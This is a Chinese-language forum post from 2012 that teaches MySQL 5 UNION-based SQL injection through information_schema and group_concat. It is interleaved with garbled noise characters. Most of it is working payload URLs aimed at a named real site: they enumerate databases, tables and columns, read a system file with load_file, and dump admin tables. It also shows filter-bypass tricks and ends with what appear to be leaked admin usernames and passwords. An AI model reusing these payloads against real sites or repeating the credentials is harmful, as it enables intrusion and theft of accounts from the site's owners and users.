此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
/ H) |. b5 l6 c+ D& m9 E, H J但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人! ]1 d' [, y9 R& E
7 B( m& I! V; @& U7 n
5 w) J% _/ o8 y5 N: H) ?优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
2 r; `4 E- V8 x8 f% G
2 u {1 \8 P7 A# B: n/ u5 }缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
* e# e- E- p2 N& |, Y
/ F+ v4 B; h" R8 `, ~" ^下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示$ |& T5 h- E+ X: F9 s' x
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
2 I/ l. P7 }3 q4 z) {. q% S: v" i% ?
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
# w6 P# h* F7 [$ L& a+ [* x: l0 I% N0 C g! J. e% l. k& n
读出所有库:
/ ^8 t0 b$ U+ b0 V: H2 xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA, e' j, p" d: o3 W' o3 q
6 k: y& }/ Y+ X0 J4 K
+ f0 D9 ~8 L; R" Z$ _' S1 y
8 I S1 L6 P7 Q- H9 {, v
读出所有表:
; I* s# N- G' q, {+ U! ?- uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
8 y- R/ U8 e2 E
- X2 X0 Z3 l; B读出所有表字段:8 _ w" N% J5 M+ ~4 |& q* @
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
( d* ?1 L. w+ f7 f) Z. O*/ (97,100,109,105,110)为admin的ascii码 依次类推) p" U8 d( o0 @/ c4 D9 d
+ X% P8 o8 D$ z6 `6 F9 u' G
读出所有表字段里的内容:
?5 l& c" ]/ M7 Shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin! h" [3 a" z) w/ O# X* i, C
: H: E, v# ^3 i8 ^
& K N, M a6 F6 ]* f" v, U. z" u. M5 v; k* X$ A6 a
. X( X% y; \8 f' v7 i: A1 i) S8 o) m- a6 n9 Q
4 A m6 P; u0 T
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
1 J# P& T0 _2 r4 j8 w7 _0 K+ V' N' i( ?5 L
% k1 g9 r0 e3 Z3 t' e
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23/ P4 W3 E" E* {! z2 u# f: q! r
C' ?+ R7 ~" u8 f- C# u- K
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
8 I2 A" E% Z! Q6 e/ I( m Q; @* w( G& Z
7 N' E4 ?9 ?% Mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
/ O5 q9 K; A3 o+ d, F; ]# f
6 M( ^$ f/ M0 A6 r0 z
" D. m% |2 H% R3 G) p" p webmaster:dzb521123,simlab:simadmin20043233
2 F) m2 f m M/ n& _ |
发表于 2012-9-13 16:37:34
收藏
支持
反对